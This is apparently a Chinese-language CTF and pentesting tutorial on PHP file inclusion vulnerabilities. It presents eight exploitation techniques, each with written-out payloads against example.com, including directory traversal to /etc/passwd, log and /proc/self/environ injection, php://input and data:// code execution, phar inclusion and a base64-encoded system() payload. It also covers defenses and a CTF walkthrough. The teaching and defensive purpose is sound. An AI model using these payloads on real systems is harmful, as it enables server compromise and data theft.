CTF文件包含漏洞实战：8种渗透方法与防御策略

1. 项目背景与核心价值

文件包含漏洞一直是CTF比赛和真实渗透测试中的高频考点，也是Web安全工程师必须掌握的实战技能。这个"CTF-PTE 文件包含8"项目系统地整理了八种不同场景下的文件包含利用手法，覆盖了从基础到进阶的完整知识体系。

我在实际渗透测试工作中发现，很多开发人员对文件包含漏洞存在认知误区，认为简单的防护措施就能彻底解决问题。事实上，文件包含的利用方式远比想象中多样，不同环境、不同配置下的绕过手法也各有特点。这个项目正好填补了市面上系统化教学资料的空白。

2. 文件包含漏洞基础原理

2.1 漏洞形成机制

文件包含漏洞通常出现在使用PHP的include、require等函数时，当开发者未对用户输入的参数进行严格过滤，攻击者就可以通过构造特殊路径来包含恶意文件。根据包含方式不同可分为：

• 本地文件包含(LFI)：包含服务器本地的文件
• 远程文件包含(RFI)：通过URL包含远程服务器上的文件

关键点：PHP的allow_url_include配置项决定了是否允许RFI，在PHP5.2之后默认关闭

2.2 常见危险函数

这些PHP函数如果使用不当就会导致文件包含漏洞：

php复制include()
include_once()
require() 
require_once()
fopen()
file_get_contents()

3. 八种渗透方法深度解析

3.1 基础本地文件包含

最基本的利用方式，通过目录遍历读取敏感文件：

code复制http://example.com/index.php?page=../../../../etc/passwd

实战技巧：

• 尝试不同层级的../组合
• 使用绝对路径有时更有效
• Windows系统可以用..\替代../

3.2 日志文件注入

通过向访问日志、错误日志等写入PHP代码，再包含该日志文件实现代码执行。

典型利用步骤：

1. 确定日志文件位置（如/var/log/apache2/access.log）
2. 发送包含PHP代码的请求
3. 包含该日志文件

code复制http://example.com/index.php?page=/var/log/apache2/access.log

注意：需要Web服务器有日志文件读取权限

3.3 PHP伪协议利用

PHP内置的多种伪协议为文件包含提供了更多可能性：

• php://filter：读取文件内容

code复制?page=php://filter/convert.base64-encode/resource=index.php

• php://input：执行POST数据中的代码

code复制POST /index.php?page=php://input HTTP/1.1
...
<?php system('id'); ?>

• data://：直接包含数据流

code复制?page=data://text/plain,<?php phpinfo();?>

3.4 会话文件包含

当知道会话文件存储路径和文件名格式时，可以包含session文件执行代码。

利用条件：

1. 能够预测或获取session ID
2. 知道session存储路径（如/var/lib/php/sessions/）

典型利用：

code复制?page=/var/lib/php/sessions/sess_[sessionid]

3.5 环境变量包含

通过包含/proc/self/environ等环境变量文件，结合User-Agent等HTTP头注入代码。

示例：

code复制GET /index.php?page=/proc/self/environ HTTP/1.1
User-Agent: <?php system('id');?>

3.6 临时文件包含

利用上传功能生成临时文件，在文件被删除前包含执行。

关键点：

• 需要竞争条件利用
• 临时文件路径通常包含随机字符串

3.7 压缩文件包含

通过zip/phar协议包含压缩包中的恶意文件：

code复制?page=phar:///path/to/file.zip/evil.php

3.8 编码绕过技巧

当存在简单过滤时，可以使用各种编码方式绕过：

• Base64编码：

code复制?page=php://filter/convert.base64-decode/resource=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOz8+

• 双重编码：

code复制?page=....//....//etc/passwd

4. 防御与加固方案

4.1 输入验证策略

• 白名单验证：只允许特定的文件名
• 路径限制：禁止包含上级目录(../)
• 后缀检查：强制添加.php等安全后缀

4.2 服务器配置建议

• 关闭allow_url_include和allow_url_fopen
• 设置open_basedir限制文件访问范围
• 确保会话文件存储在不可访问的目录

4.3 代码层防护

• 使用basename()处理文件名
• 添加固定前缀路径
• 对输入进行严格的过滤

5. 实战经验与排错指南

在真实环境中遇到文件包含漏洞时，我通常会按照以下流程进行测试：

1. 确认漏洞存在：尝试包含/etc/passwd等已知文件
2. 信息收集：查看phpinfo()获取服务器配置
3. 尝试各种包含方式：从简单到复杂逐个测试
4. 绕过限制：根据过滤情况尝试编码、截断等技巧

常见问题排查：

Q：包含文件没有效果？
A：检查文件路径是否正确，是否有读取权限

Q：伪协议无法使用？
A：确认allow_url_include是否开启

Q：包含后代码不执行？
A：检查文件是否被解析为PHP，尝试不同的封装器

6. CTF实战案例分析

以某次CTF比赛中的文件包含题目为例，解题过程如下：

1. 发现页面有file参数
2. 尝试包含/etc/passwd成功
3. 使用php://filter读取index.php源码
4. 分析源码发现需要包含特定文件
5. 通过日志注入获得flag

关键payload：

code复制?file=php://filter/convert.base64-encode/resource=index.php

解码后获得关键信息：

php复制if(isset($_GET['secret'])){
    include($_GET['secret'].'.php');
}

最终通过包含session文件获得flag。

7. 自动化测试工具推荐

对于大规模测试，可以使用以下工具辅助发现文件包含漏洞：

• Burp Suite：手动测试和扫描
• Ffuf：目录爆破和文件枚举
• LFI Suite：自动化LFI测试工具

典型命令：

bash复制ffuf -w wordlist.txt -u "http://example.com/index.php?page=FUZZ"

8. 学习资源与进阶路径

想深入掌握文件包含漏洞，建议参考：

• OWASP测试指南中的文件包含部分
• PHP官方文档中的各种封装协议说明
• 知名CTF平台的Web题目

个人建议的学习路线：

1. 掌握基础LFI/RFI
2. 学习各种伪协议
3. 研究日志/session包含
4. 掌握编码绕过技巧
5. 参与CTF实战练习

在实际渗透测试工作中，文件包含往往能与其他漏洞形成组合攻击。比如先通过文件包含读取配置文件获取数据库凭证，再结合SQL注入进一步渗透。这种漏洞串联的思路在高级渗透测试中尤为重要。